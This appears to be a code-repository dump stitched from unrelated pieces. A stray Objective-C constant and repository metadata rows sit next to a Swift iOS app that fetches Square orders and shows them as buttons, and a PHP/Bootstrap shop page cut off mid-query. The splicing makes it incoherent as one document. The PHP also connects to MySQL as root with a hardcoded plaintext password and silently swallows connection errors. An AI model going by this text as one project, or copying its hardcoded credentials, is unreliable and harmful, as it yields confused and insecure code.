static NSString * const ATSMainWindowDidCloseNotification = @"com.eyeplum.atos.mainWindowClose";
#endif
| 1ce49569b975d5e575172b1308e0d920346a787a | [
"Markdown",
"C"
] | 2 | Markdown | Naituw/EYEAtos | 77c4a551a587ca438bc292299045c0343029da49 | 073624b56a49dece9ee142a113c22a14a3f780c2 |
refs/heads/main | <repo_name>sho0120/OrderControlForSquare<file_sep>/Order Control for Square/ViewController.swift
//
// ViewController.swift
// Order Control for Square
//
// Created by 李昌 on 2020/04/23.
// Copyright © 2020 李昌. All rights reserved.
//
import UIKit
import Alamofire
import SwiftyJSON
class ViewController: UIViewController {
//https transition
//test
var parameters: [String: Any] = [
"location_ids": [
"YOUR ID"
],
"query": [
"filter": [
"date_time_filter": [
"created_at": [
"start_at": "2019-11-24T11:30:00+09:00",
"end_at": "2019-11-24T12:00:00+09:00"
]
]
]
]
]
private let headers: HTTPHeaders = [
"Square-Version": "2020-08-26",
"Authorization": "Bearer YOUR TOKEN",
"Content-Type": "application/json"
]
//for updating order
var time: String!
let formatter = ISO8601DateFormatter()
//navigation controller
var addBtn: UIBarButtonItem!
var seeStock: UIBarButtonItem!
//from json responce by alamofire
private var orders: Response?
override func viewDidLoad() {
super.viewDidLoad()
edgesForExtendedLayout = []
self.title = "Home"
//add buttons to navigationbar
addBtn = UIBarButtonItem(title: "スタッフ", style: UIBarButtonItem.Style.plain, target: self, action: #selector(ViewController.editMember))
self.navigationItem.leftBarButtonItem = addBtn
seeStock = UIBarButtonItem(title: "後続のオーダー >", style: UIBarButtonItem.Style.plain, target: self, action: #selector(ViewController.seeOrderStock))
self.navigationItem.rightBarButtonItem = seeStock
self.view.addSubview(self.navigationController!.navigationBar)
self.time = formatter.string(from: Date())
//put buttons
let buttonNumber = 8
let screenSize: CGSize = UIScreen.main.bounds.size
let width = screenSize.width
let height = screenSize.height
let upper = height * 0.05
let lower = height * 0.55
let wideSpace = width * 0.25
let viewHeight = height * 0.4
let viewWidth = width * 0.2
let fromWideSpace = width * 0.025
//self.navigationController?.navigationBar.frame = CGRect(x:0, y:0, width: width, height: 60)
//self.navigationController?.navigationBar.isHidden = false
for i in 0..<buttonNumber{
if(i%2 == 0){
let orderButton = OrderSheet(frame: CGRect(x: wideSpace * CGFloat(Int(i/2)) + fromWideSpace, y: upper, width: viewWidth, height: viewHeight))
self.view.addSubview(orderButton)
}
else{
let orderButton = OrderSheet(frame: CGRect(x: wideSpace * CGFloat(Int(i/2)) + fromWideSpace, y: lower, width: viewWidth, height: viewHeight))
self.view.addSubview(orderButton)
}
}
//alamofire
AF.request("https://connect.squareup.com/v2/orders/search", method: .post, parameters: self.parameters, encoding: JSONEncoding.default, headers: self.headers).responseJSON{res in
guard let json = res.data else{
print("no_json")
return
}
var menues: [String] = []
self.orders = try! JSONDecoder().decode(Response.self, from: json)
if self.orders != nil {
for order in self.orders!.orders{
var menu: String = ""
for i in 0 ..< order.lineItems.count{
menu.append(order.lineItems[i].name)
menu.append(":\t")
menu.append(order.lineItems[i].quantity)
if(i != order.lineItems.count - 1){
menu.append("\n")
}
}
menues.append(menu)
}
OrderSheet.addData(data: menues)
print(OrderSheet.views)
}
else{print("decode failed")}
}
}
//left
@objc func editMember() {
let second = MemberController()
self.navigationController?.pushViewController(second, animated: true)
}
//right
@objc func seeOrderStock() {
let second = OrderStockController()
self.navigationController?.pushViewController(second, animated: true)
}
override func didReceiveMemoryWarning() {
super.didReceiveMemoryWarning()
}
}
class OrderSheet: UIView{
var menu: String!
var mainButton: UIButton!
var waveView: UIView!
var status: Int! //-1, 0, or 1
static var views: [OrderSheet] = [] //search button's title
static var orderStock: [String] = [] //input: menues from json data (reformed)
override init(frame: CGRect) {
super.init(frame: frame)
self.mainButton = UIButton()
self.waveView = UIView()
self.waveView.layer.borderWidth = 2.0
self.mainButton.setTitle(self.menu, for: [])
self.mainButton.setTitleColor(UIColor.white, for: [])
self.waveView.layer.cornerRadius = 10
self.waveView.backgroundColor = UIColor.clear
self.mainButton.layer.cornerRadius = 10
self.status = -1
self.mainButton.titleLabel?.numberOfLines = 0
OrderSheet.views.append(self)
}
required init?(coder: NSCoder) {
fatalError("init(coder:) has not been implemented")
}
override func layoutSubviews(){
super.layoutSubviews()
mainButton.frame = self.frame
waveView.frame = CGRect(x: 0, y: 0, width: self.frame.width, height: self.frame.height)
self.addSubview(mainButton)
mainButton.addSubview(waveView)
waveView.isUserInteractionEnabled = false
mainButton.center = waveView.center
self.mainButton.addTarget(self, action: #selector(self.onTap(_:)), for: .touchUpInside)
self.display(status: self.status)
OrderSheet.addData(data: [])
}
func display(status: Int){
switch status {
case 1:
self.mainButton.setTitle(self.menu, for: [])
self.mainButton.backgroundColor = UIColor(red: 0, green: 122 / 255, blue: 1, alpha: 1)
self.waveView.layer.borderColor = UIColor(red: 0, green: 122 / 255, blue: 1, alpha: 0.7).cgColor
//wave motion
UIView.animate(withDuration: 1.5, delay: 0.0, options: [.repeat], animations: {
let affine = CGAffineTransform(a: 1.2, b: 0, c: 0, d: 1.2, tx: 0, ty: 0)
self.waveView.transform = affine
self.waveView.alpha = 0
}, completion: nil)
case 0:
waveView.layer.removeAllAnimations()
let affine = CGAffineTransform(a: 1.0, b: 0, c: 0, d: 1.0, tx: 0, ty: 0)
self.waveView.transform = affine
mainButton.backgroundColor = UIColor(red: 63 / 255, green: 185 / 255, blue: 185 / 255, alpha: 1.0)
//reset waveView
self.waveView.frame = CGRect(x: 0, y: 0, width: self.frame.width, height: self.frame.height)
self.waveView.alpha = 0.7
case -1:
if(OrderSheet.orderStock.isEmpty){
self.menu = nil
self.mainButton.setTitle(self.menu, for: [])
mainButton.backgroundColor = UIColor(red: 185 / 255, green: 185 / 255, blue: 185 / 255, alpha: 1.0)
}
else{
self.menu = OrderSheet.orderStock.first
self.mainButton.setTitle(self.menu, for: [])
OrderSheet.orderStock.removeFirst()
self.status = 1
self.display(status: self.status)
}
default:
print("Invalid Input")
}
}
static func addData(data: [String]){
OrderSheet.orderStock += data
for view in OrderSheet.views{
if(view.menu == nil && (!OrderSheet.orderStock.isEmpty)){
view.menu = OrderSheet.orderStock.first
OrderSheet.orderStock.removeFirst()
view.status = 1
view.display(status: view.status)
}
}
}
//when tapped
@objc func onTap(_ sender: UIButton){
self.status -= 1
display(status: self.status)
}
}
//define json's struct
//encode
/*
struct Parameters{
let locationIds: [String]
let startAt: String
let endAt: String
}
extension Parameters: Encodable {
private struct CustomCodingKey: CodingKey {
var stringValue: String
init?(stringValue: String) {
self.stringValue = stringValue
}
var intValue: Int?
init?(intValue: Int) { return nil }
static let locationIds = CustomCodingKey(stringValue: "location_ids")!
static let query = CustomCodingKey(stringValue: "query")!
static let filter = CustomCodingKey(stringValue: "filter")!
static let dateTimeFilter = CustomCodingKey(stringValue: "date_time_filter")!
static let createdAt = CustomCodingKey(stringValue: "createdAt")!
static let startAt = CustomCodingKey(stringValue: "start_at")!
static let endAt = CustomCodingKey(stringValue: "end_at")!
}
func encode(to encoder: Encoder) throws {
var container = encoder.container(keyedBy: CustomCodingKey.self)
try container.encode(locationIds, forKey: .locationIds)
var queryContainer = container.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .query)
var filterContainer = queryContainer.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .filter)
var dateTimeFilterContainer = filterContainer.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .dateTimeFilter)
var createdAtContainer = dateTimeFilterContainer.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .createdAt)
/*
var startAtContainer = createdAtContainer.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .startAt)
var endAtContainer = createdAtContainer.nestedContainer(keyedBy: CustomCodingKey.self, forKey: .endAt)
*/
try createdAtContainer.encode(startAt, forKey: .startAt)
try createdAtContainer.encode(endAt, forKey: .endAt)
}
}
*/
//decode
struct Response: Decodable{
struct Order: Decodable{
struct LineItem: Decodable{
let quantity: String
let name: String
}
enum CodingKeys: String, CodingKey{
case lineItems = "line_items"
}
let lineItems: [LineItem]
}
let orders: [Order]
}
<file_sep>/Order Control for Square/OrderStockController.swift
//
// OrderStockController.swift
// Order Control for Square
//
// Created by 李昌 on 2020/11/18.
// Copyright © 2020 李昌. All rights reserved.
//
import Foundation
import UIKit
class OrderStockController: UIViewController{
override func viewDidLoad() {
super.viewDidLoad()
self.title = "後続のオーダー"
}
}
<file_sep>/Order Control for Square/MemberController.swift
//
// PreViewController.swift
// Order Control for Square
//
// Created by 李昌 on 2020/11/04.
// Copyright © 2020 李昌. All rights reserved.
//
import Foundation
import UIKit
//function:select, add, delete
class MemberController: UIViewController{
var whoIsInShift: [String] = []
var toolbar: UIToolbar?
override func viewDidLoad() {
super.viewDidLoad()
self.title = "今日のスタッフは?"
let scrollView = UIScrollView()
self.view.addSubview(scrollView)
for staff in self.whoIsInShift{
//let button = staffNameButton(frame: CGRect(x: y: ))
}
}
}
class staffNameButton: UIButton{
required init?(coder: NSCoder) {
fatalError("init(coder:) has not been implemented")
}
init(frame: CGRect, name: String) {
super.init(frame: frame)
self.setTitle(name, for: [])
self.layer.cornerRadius = 2.0
self.setTitleColor(UIColor.white, for: [])
self.layer.borderWidth = 1.0
self.layer.borderColor = UIColor.blue.cgColor
}
override func layoutSubviews() {
self.titleLabel?.numberOfLines = 1
}
}
| 335358993736cdf0b0e3a1659d984350a485d5e8 | [
"Swift"
] | 3 | Swift | sho0120/OrderControlForSquare | e55304e77d59b9141216ce82c4be92880b121330 | e47d6fd2bbc6b033f67d509e5ac4c05326783171 |
refs/heads/master | <file_sep>export * from './nav-main.component';<file_sep>import {
Component,
OnInit
} from '@angular/core';
import { ScaffoldService } from '../../../services/scaffold.service' //Import the service. Note that you have to know the path and do NOT include the .ts extension
@Component({
selector: 'scaffolding', // <scaffolding></scaffolding> <-- Include in HTML with this
// We need to tell Angular's Dependency Injection which providers are in our app.
//providers: [],
templateUrl: './scaffolding.component.html'
})
export class ScaffoldingComponent implements OnInit {
user: any = {}
errorLoading: boolean = false
sampleData: any = {first: 'j', last: 'k'};
// TypeScript public modifiers
constructor(
private scaffoldService: ScaffoldService
) { }
public ngOnInit() {
this.scaffoldService.getUserProfile('jkrause').subscribe(
res => this.user = res,
error => this.errorLoading = true
)
}
/**
* Toggle the error message
*/
public showErrorMessage() {
this.errorLoading = !this.errorLoading
}//showErrorMessage
sampleCallback() {
console.log('callback function was called');
}
}
<file_sep>import { Component, OnInit, Input } from '@angular/core';
import { NgbModal, NgbModalOptions } from '@ng-bootstrap/ng-bootstrap';
// import any modal content components
import { SampleModalContentComponent } from '../../modals/sample-modal-content/sample-modal-content.component';
@Component({
selector: 'button-modal',
templateUrl: './button-modal.component.html',
//styleUrls: ['./button-modal.component.css']
})
export class ButtonModalComponent implements OnInit {
modalContent = {
// add modal content components to this map
sample: SampleModalContentComponent
};
@Input() classes: string = 'btn btn-outline-primary btn-sm';
@Input() modalName: string;
@Input() modalSize: string = "md";
@Input() model: any;
@Input() callback: Function;
constructor(private modalService: NgbModal) { }
ngOnInit() { }
openModal() {
const modalToOpen = this.modalContent[this.modalName];
// store reference to the modal instance
const modalRef = this.modalService.open(modalToOpen, {backdrop: 'static', size: this.modalSize});
// add any passed in data to the modal instance
modalRef.componentInstance.model = this.model;
// wait for promise that is returned when modal is closed or dismissed
modalRef.result.then((closeReason) => {
console.log('modal was closed: ', closeReason);
this.callback();
}, (dismissReason) => {
console.log('modal was dismissed: ', dismissReason);
});
}
}<file_sep>export * from './sample-modal-content.component';<file_sep>import { Injectable } from '@angular/core';
import { Http, Response } from '@angular/http';
import { Observable } from 'rxjs/Rx';
import 'rxjs/Rx';
import 'rxjs/add/operator/map';
import 'rxjs/add/operator/share';
import 'rxjs/add/operator/publishReplay';
@Injectable()
export class ScaffoldService {
user : any
constructor(
private http: Http
) {
console.log(this)
}
/**
* Get the AD data of the user
* @param user - username to look up
* @param update - remove cached version to get new one
*/
public getUserProfile(user:string, update?:boolean) {
let url = '/api/Service/getUserProfile/' + user
url = '/app/mock-data/GetUserProfile.json'
if (update) { this.user = null }
if (!this.user){
this.user = this.http.get(url)
.map(res => res.json())
.publishReplay(1)
.refCount();
}
return this.user
}//end getUserProfile
}
<file_sep>import {
Component,
OnInit
} from '@angular/core';
@Component({
selector: 'home', // <home></home>
// We need to tell Angular's Dependency Injection which providers are in our app.
//providers: [],
// Our list of styles in our component. We may add more to compose many styles together
//styleUrls: ['./header.component.css'],
// Every Angular template is first compiled by the browser before Angular runs it's compiler
templateUrl: './home.component.html'
})
export class HomeComponent implements OnInit {
// TypeScript public modifiers
constructor(
) { }
public ngOnInit() {
}
public submitState(value: string) {
}
}
<file_sep>import {
Component,
OnInit
} from '@angular/core';
@Component({
selector: 'layout-main',
templateUrl: './layout-main.component.html'
})
export class LayoutMainComponent implements OnInit {
// TypeScript public modifiers
constructor(
) { }
public ngOnInit() {
//console.log('hello `Home` component');
// this.title.getData().subscribe(data => this.data = data);
}
}
<file_sep>import { Component, OnInit, Input } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
@Component({
selector: 'sample-modal-content',
templateUrl: './sample-modal-content.component.html',
})
export class SampleModalContentComponent implements OnInit {
error: boolean | string;
constructor(public activeModal: NgbActiveModal) { }
ngOnInit() {}
handleSubmit() {
this.error = false;
// do some http | async stuff
// pass in boolean to test
this.sampleAsync().then((res) => {
// Successful
this.activeModal.close(res);
}, (res) => {
// Error
this.error = res;
});
}
sampleAsync(result:boolean = true) {
return new Promise((resolve, reject) => {
setTimeout(() => {
if(result) {
resolve('Request was Successful');
} else {
reject('Request Failed');
}
}, 1000)
})
}
}
<file_sep>export * from './scaffolding.component';<file_sep>import { Routes, RouterModule } from '@angular/router';
//Routable components
import { LayoutMainComponent } from './components/masterpage/layout-main';
import { NoContentComponent } from './components/routes/no-content';
import { HomeComponent } from './components/routes/home';
import { ScaffoldingComponent } from './components/routes/scaffolding';
import { DataResolver } from './app.resolver';
export const ROUTES: Routes = [
{
path: '', component: LayoutMainComponent,
children: [
{ path: '', component: HomeComponent },
{ path: 'scaffolding', component: ScaffoldingComponent },
{ path: '**', component: NoContentComponent }
]
}
]; <file_sep>import {Component, OnInit} from '@angular/core';
@Component({
selector: 'nav-main',
templateUrl: './nav-main.component.html'
})
export class NavMainComponent implements OnInit {
constructor(
) {
}
public ngOnInit() {
}
}
<file_sep>export * from './button-modal.component'; | 82b06664806299072d6389bf1a67c9e76105bfb6 | [
"TypeScript"
] | 12 | TypeScript | JerrolKrause/angular2-seed | 32f7332e6218b39dc96af7a18f1cd538b38a922f | 99011d8e842119e6760af3c37a9dacf3b7002ebd |
refs/heads/master | <file_sep>""" This program simulates a SQL database to test our recipe suggestion algorithm"""
import numpy as np
import base64
import psycopg2
# table of recipes.
# ID ingredients amounts
#recipes = np.asarray([[[1], [2,5,8,4], [4,2,6,3]],
# [[2], [5,7,1,2], [8,9,3,4]],
# [[3], [6,7,3], [6,9,8]],
# [[4], [2,5,8,9,3], [4,5,6,3,2]]])
#table of available ingredients
# ID amount
#ingredients = np.asarray([[1, 4],
# [2, 5],
# [3, 1],
# [4, 4],
# [5, 8],
# [6, 6],
# [7, 7],
# [8, 2],
# [9, 5]])
max_recipes = np.asarray([0,0,0,0,0]) #IDs of max overlap recipes
max_overlap = np.asarray([0,0,0,0,0])
#Get ingredient IDs from SQL as numpy array
#I = ingredients[:,0] # array of ingredient IDs
conn = psycopg2.connect('dbname=grocery_guard')
cur = conn.cursor()
cur.execute("select id from fridge")
I = np.asarray(cur.fetchall())
cur.execute("select id from recipes")
recipes = np.asarray(cur.fetchall())
#j=0
#get max recipe ID to use as loop control
cur.execute("select id from recipes where id = (select max(id) from recipes)")
num_recs = int(cur.fetchone()[0])
print "number of recipes: ", num_recs
#print 'r',max_recipes,'o', max_overlap
#print "---------------------------------------"
#Get list of recipe IDs from SQL
for r in range(1,num_recs+1):
#get row for recipe ID r from SQL as numpy array
cur.execute("select ingredients from recipes where id = %s" % str(r))
ri = np.asarray(cur.fetchone())[0] #ingredients for recipe r
cur.execute("select amounts from recipes where id = %s" % str(r))
ra = np.asarray(cur.fetchone())[0] #amounts for recipe r
#ri =np.asarray(recipes[j][1]) # r's ingredients
s = np.intersect1d(ri,I)
n = s.size
#print "ingredients ", I
#print "required ", ri
#print "difference ", I-ri
#print "overlap ", n
for i in s:
indr = np.where(ri==i)[0][0] # index of i in r's ingredient list
#indi = np.where(ingredients[:,0]==i)[0][0]
#cur.execute("select id from fridge where id = %s" % str(i))
#indi = int(cur.fetchone()[0])
#Get Ingredient row for ID indi from SQL as numpy array
cur.execute("select quantity from fridge where id = %s" % str(i))
tmp = cur.fetchone()[0]
if tmp < ra[indr] : #amount of ingredient i
print "subtracted ", r
n-=1
#n+=1
# print 'recipe: ',r[0]
# print indi, indr
#print "recipe: " + str(r), "overlap: ", n
m = np.min(max_overlap)
n = float(n)/ra.shape[0] #convert to percentage
if n > m:
#print "m: ",m, "n: ",n
ind = np.where(max_overlap==m)[0][0]
#print ind
max_overlap = np.delete(max_overlap,ind)
max_overlap = np.append(max_overlap,n)
max_recipes = np.delete(max_recipes,ind)
max_recipes = np.append(max_recipes,r)
#print 'r',max_recipes
#print 'o', max_overlap
#j+=1
print 'recipes: ',max_recipes
print 'sizes: ',max_overlap
<file_sep># Test for zbar-py using a webcam
# Written by <NAME> (<EMAIL>)
# Tested with linux
#
# Required: pygame
#
# Instructions:
# 1) Set the cam source '/dev/video0'
# 2) Get a pic. If pic doesnot look good, then press enter at terminal.
# Camera will take another pic. When done press q and enter to quit camera mode
# 3) You will get reading on the terminal
#
import zbar
import zbar.misc
import numpy as np
import picamera
import picamera.array
import time
import pygame
import pygame.camera
import pygame.image
import pygame.surfarray
from PIL import Image
import sys
def get_image_array_from_webcam(cam_name,cam_resolution):
"""Get an image ndarray from webcam using pygame."""
pygame.init()
pygame.camera.init()
pygame.camera.list_cameras()
cam = pygame.camera.Camera(cam_name, cam_resolution,'RGB')
#print cam
screen = pygame.display.set_mode(cam.get_size())
print('Get a pic of barcode. If pic doesnot look good, then press enter at terminal. \
Camera will take another pic. When done press q and enter to quit camera mode')
while True:
cam.start()
time.sleep(0.5) # You might need something higher in the beginning
pygame_screen_image = cam.get_image()
screen.blit(pygame_screen_image, (0,0))
pygame.display.flip() # update the display
cam.stop()
if raw_input() == "q":
break
pygame.display.quit()
image_ndarray = pygame.surfarray.array3d(pygame_screen_image)
img_arr = np.dot(image_ndarray[...,:3], [0.299, 0.587, 0.114])
img_arr=img_arr.astype(np.uint8)
return img_arr
def main_webcam():
#----------------------------------------------------------------------------------
# Get the pic
# To get pic from cam or video, packages like opencv or simplecv can also be used.
#----------------------------------------------------------------------------------
# Cam name might vary depending on your PC.
cam_name='/dev/video0'
cam_resolution=(640,480) # A general cam resolution
img_ndarray = get_image_array_from_webcam(cam_name, cam_resolution)
#-------------------------------------------------------------------------
# Read the Barcode
#-------------------------------------------------------------------------
# Detect all
scanner = zbar.Scanner()
results = scanner.scan(img_ndarray)
if results==[]:
print("No Barcode found.")
else:
for result in results:
# By default zbar returns barcode data as byte array, so decode byte array as ascii
print(result.type, result.data.decode("ascii"), result.quality)
def get_image_array_from_picam(cam_resolution):
"""get an image array from the picamera"""
with picamera.PiCamera() as camera:
with picamera.array.PiRGBArray(camera) as output:
camera.resolution = cam_resolution
camera.capture(output,'rgb')
image_ndarrayRGB = output.array
print type(output)
print output.array.shape
if len(image_ndarrayRGB.shape) == 3:
image_ndarray = zbar.misc.rgb2gray(image_ndarrayRGB)
camera.close()
return image_ndarray, image_ndarrayRGB
def main_picam():
#----------------------------------------------------------------------------------
# Get the pic
# To get pic from cam or video, packages like opencv or simplecv can also be used.
#----------------------------------------------------------------------------------
# Cam name might vary depending on your PC.
#cam_name='/dev/video1'
cam_resolution=(640,480) # A general cam resolution
results = []
while results == []:
img_ndarray, img_ndarrayRGB = get_image_array_from_picam(cam_resolution)
#-------------------------------------------------------------------------
# Read the Barcode
#-------------------------------------------------------------------------
# Detect all
scanner = zbar.Scanner()
results = scanner.scan(img_ndarray)
if results==[]:
print("No Barcode found.")
else:
for result in results:
# By default zbar returns barcode data as byte array, so decode byte array as ascii
print(result.type, result.data.decode("ascii"), result.quality)
img = Image.fromarray(img_ndarrayRGB, 'RGB')
img.show()
#time.sleep(1)
raw_input('Enter')
results = []
if __name__ == "__main__":
if len(sys.argv) > 1 and (sys.argv[1] in ["picam","picamera","p"]):
#print "picamera accessed"
main_picam()
else:
main_webcam()
<file_sep>""" This program simulates a SQL database to test our recipe suggestion algorithm"""
import numpy as np
import base64
import psycopg2
# table of recipes.
# ID ingredients amounts
recipes = np.asarray([[[1], [1,2,3,4,5], [1,1,1,1,1]],
[[2], [5,7,1,2], [1,9,3,4]],
[[3], [6,7,3], [1,1,1]],
[[4], [2,5,8,9,3], [4,5,6,3,2]],
[[5], [1,2,3,4,5], [1,1,1,1,2]],
[[6], [1,2,3], [1,1,1]]])
#table of available ingredients
# ID amount
ingredients = np.asarray([[1, 1],
[2, 1],
[3, 1],
[4, 1],
[5, 1],
[6, 1],
[7, 1],
[8, 1],
[9, 1]])
max_recipes = np.asarray([-3,-2,-1,0]) #IDs of max overlap recipes
max_overlap = np.asarray([-3,-2,-1,0])
#Get ingredient IDs from SQL as numpy array
I = ingredients[:,0] # array of ingredient IDs
#conn = psycopg2.connect('dbname=grocery_guard')
#cur = conn.cursor()
#cur.execute("select id from fridge")
#I = np.asarray(cur.fetchall())
#cur.execute("select (id,ingredients,amounts) from recipes")
#recipes = np.asarray(cur.fetchall())
j=0
#Get list of recipe IDs from SQL
for r in recipes:
#get row for recipe ID r from SQL as numpy array
ri =np.asarray(recipes[j][1])
print "ri: ",ri
s = np.intersect1d(ri,I)
print "s: ",s
n = s.size
print "n: ",n
for i in s:
indr = np.where(r[1]==i)[0][0] # index of i in r's ingredient list
indi = np.where(ingredients[:,0]==i)[0][0]
#Get Ingredient row for ID indi from SQL as numpy array
if ingredients[indi,1] < r[2][indr] : #amount of ingredient i
n-=1
#n+=1
# print 'recipe: ',r[0]
# print indi, indr
m = np.min(max_overlap)
#print 'ind: ',ind
print 'recipes: ',max_recipes
print 'size: ',max_overlap
#print 'indi: ',indi
#print "m: ",m
#print "n: ",n
if n > m:
m = np.min(max_overlap)
ind = (np.where(max_overlap)==m)
#inds = (np.where(max_overlap)==m)
print 'ind: ',ind
max_overlap = np.delete(max_overlap,ind==True)
max_overlap = np.append(max_overlap,n)
max_recipes = np.delete(max_recipes,ind==True)
max_recipes = np.append(max_recipes,r[0])
j+=1
print 'recipes: ',max_recipes
print 'sizes: ',max_overlap
<file_sep>with open('chicken_parm.txt') as fin:
f = fin.readlines()
print f
<file_sep># Test for zbar-py using a webcam
# Written by <NAME> (<EMAIL>)
# Tested with linux
#
# Required: pygame
#
# Instructions:
# 1) Set the cam source '/dev/video0'
# 2) Get a pic. If pic doesnot look good, then press enter at terminal.
# Camera will take another pic. When done press q and enter to quit camera mode
# 3) You will get reading on the terminal
#
import zbar
import zbar.misc
import numpy as np
import picamera
import picamera.array
import time
import pygame
import pygame.camera
import pygame.image
import pygame.surfarray
from PIL import Image
def get_image_array_from_cam(cam_resolution):
'''Get animage ndarray from webcam using pygame.'''
"""
pygame.init()
pygame.camera.init()
pygame.camera.list_cameras()
cam = pygame.camera.Camera(cam_name, cam_resolution,'RGB')
#print cam
screen = pygame.display.set_mode(cam.get_size())
print('Get a pic of barcode. If pic doesnot look good, then press enter at terminal. \
Camera will take another pic. When done press q and enter to quit camera mode')
while True:
cam.start()
time.sleep(0.5) # You might need something higher in the beginning
pygame_screen_image = cam.get_image()
screen.blit(pygame_screen_image, (0,0))
pygame.display.flip() # update the display
cam.stop()
if raw_input() == "q":
break
pygame.display.quit()
image_ndarray = pygame.surfarray.array3d(pygame_screen_image)
"""
with picamera.PiCamera() as camera:
with picamera.array.PiRGBArray(camera) as output:
camera.resolution = cam_resolution
camera.capture(output,'rgb')
image_ndarrayRGB = output.array
print type(output)
print output.array.shape
if len(image_ndarrayRGB.shape) == 3:
image_ndarray = zbar.misc.rgb2gray(image_ndarrayRGB)
camera.close()
return image_ndarray, image_ndarrayRGB
#----------------------------------------------------------------------------------
# Get the pic
# To get pic from cam or video, packages like opencv or simplecv can also be used.
#----------------------------------------------------------------------------------
# Cam name might vary depending on your PC.
#cam_name='/dev/video1'
cam_resolution=(640,480) # A general cam resolution
results = []
while results == []:
img_ndarray, img_ndarrayRGB = get_image_array_from_cam(cam_resolution)
#-------------------------------------------------------------------------
# Read the Barcode
#-------------------------------------------------------------------------
# Detect all
scanner = zbar.Scanner()
results = scanner.scan(img_ndarray)
if results==[]:
print("No Barcode found.")
else:
for result in results:
# By default zbar returns barcode data as byte array, so decode byte array as ascii
print(result.type, result.data.decode("ascii"), result.quality)
img = Image.fromarray(img_ndarrayRGB, 'RGB')
img.show()
#time.sleep(1)
raw_input('Enter')
results = []
<file_sep>from num2words import num2words
from subprocess import call
cmd_beg = 'espeak '
cmd_end = ' | aplay /home/pi/GroceryGuard/Text.wav 2>/dev/null'
cmd_out = '--stdout > /home/pi/GroceryGuard/Text.wav '
text=raw_input(" ENter text: ")
print(text)
text=text.replace(' ','_')
call([cmd_beg+cmd_out+text+cmd_end], shell=True)
<file_sep>import sys
import base64
import psycopg2
def main(recipe):
with open(recipe + '.txt') as fin:
print 'reading txt'
lines = fin.readlines()
ID,name,ingredients,amounts = lines[0][:-1].split(';')
lines = lines[1:]
instructions = ''
for line in lines:
instructions = instructions + line
with open(recipe + '.jpg') as fin:
print 'reading image'
image = base64.b64encode(fin.read())
write_to_db(ID,name,ingredients,amounts,instructions,image)
def write_to_db(ID,name,ingredients,amounts,instructions,image):
print 'db'
conn = psycopg2.connect('dbname=grocery_guard')
print 'connected'
cur = conn.cursor()
cmd = 'insert into recipes values (%s,\'%s\',\'%s\',\'%s\',\'%s\',decode(E\'%s\',\'base64\'));' % (ID,name,ingredients,amounts,instructions,image)
#print cmd
#cmd = 'insert into recipes values (%s,\'%s\',\'%s\',\'%s\',\'%s\',decode(E\'123\\\\000456\',\'escape\'));' % (ID,name,ingredients,amounts,instructions)
#print cmd
try:
#cmd = 'insert into recipes values (%s,\'%s\',\'%s\',\'%s\',\'%s\');' % (ID,name,ingredients,amounts,instructions)
#print cmd
cur.execute(cmd)
except Exception, e:
print e.pgerror
#print cmd
conn.commit()
conn.close()
if __name__ == "__main__":
if len(sys.argv)<2:
pass
else:
print 'main'
main(sys.argv[1])
<file_sep>from num2words import num2words
from subprocess import call
cmd_beg = 'espeak '
cmd_end = ' 2>/dev/null'
x= int(raw_input("Enter a no. "))
count =" Count down starts"
print(count)
count= count.replace(' ', '_') #To identify words in the text entered
call([cmd_beg+count+cmd_end], shell=True)
for i in range(x,-1,-1):
cmd=num2words(i)
print(i)
call([cmd_beg+cmd+cmd_end], shell=True)
| 9aa91ab1c73bb624c6167d3b825cc0c44656a584 | [
"Python"
] | 8 | Python | cjs342/GroceryGuard | 1994cd14f9323d8afe62572029b3877221a40a8e | cc4b04f45a33c6c2fa58992a8c1ec54d07f9c95c |
refs/heads/master | <file_sep><!doctype html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="<NAME>">
<title>New Art Production</title>
<link href="css/bootstrap.css" rel="stylesheet">
<link href="css/style.css" rel="stylesheet">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</head>
<body>
<?php
try {
$dbconn = new PDO('mysql:host=127.0.0.1;port=3306;dbname=newart_prova', 'root', 'beppe');
$dbconn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {}
?>
<!-- navbar -->
<nav class="homenav navbar navbar-inverse navbar-static-top ">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar3">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="http://disputebills.com">
<img class="img-responsive hidden-xs" src="img/logo_rett.jpg" alt="New Art Productions">
<img class="img-responsive hidden-sm hidden-md hidden-lg" src="img/logo_quadrato.jpg" alt="New Art Productions">
</a>
</div>
<div id="navbar3" class="navbar-collapse collapse">
<ul class="nav navbar-nav navbar-right">
<li ><a href="index.php">Home</a></li>
<li><a href="#">Chi siamo</a></li>
<li class="dropdown">
<a href="categories.php" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-expanded="false">Prodotti <span class="caret"></span></a>
<ul class="dropdown-menu" role="menu">
<li><a href="products.php">Tele</a></li>
<li><a href="products.php">Specchiere</a></li>
<li><a href="products.php">Orologi</a></li>
<!--<li class="divider"></li>
<li class="dropdown-header">Nav header</li>
<li><a href="#">Separated link</a></li>
<li><a href="#">One more separated link</a></li>-->
</ul>
</li>
<li><a href="about.php">Contatti</a></li>
</ul>
</div>
<!--/.nav-collapse -->
</div>
<!--/.container-fluid -->
</nav>
<!-- end navbar -->
<!-- content -->
<div class="container-fluid">
<div class="hidden-xs col-sm-3">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title">Panel title</h3>
</div>
<div class="panel-body">
Panel content
</div>
</div>
</div>
<nav class="navbar navbar-inverse navbar-collapse hidden-sm hidden-md hidden-lg">
<div class="container-fliud">
</div>
</nav>
<div class="col-xs-12 col-sm-9">
<?php
$statement = $dbconn->prepare('SELECT LinkImmagine FROM Immagini');
$statement->execute();
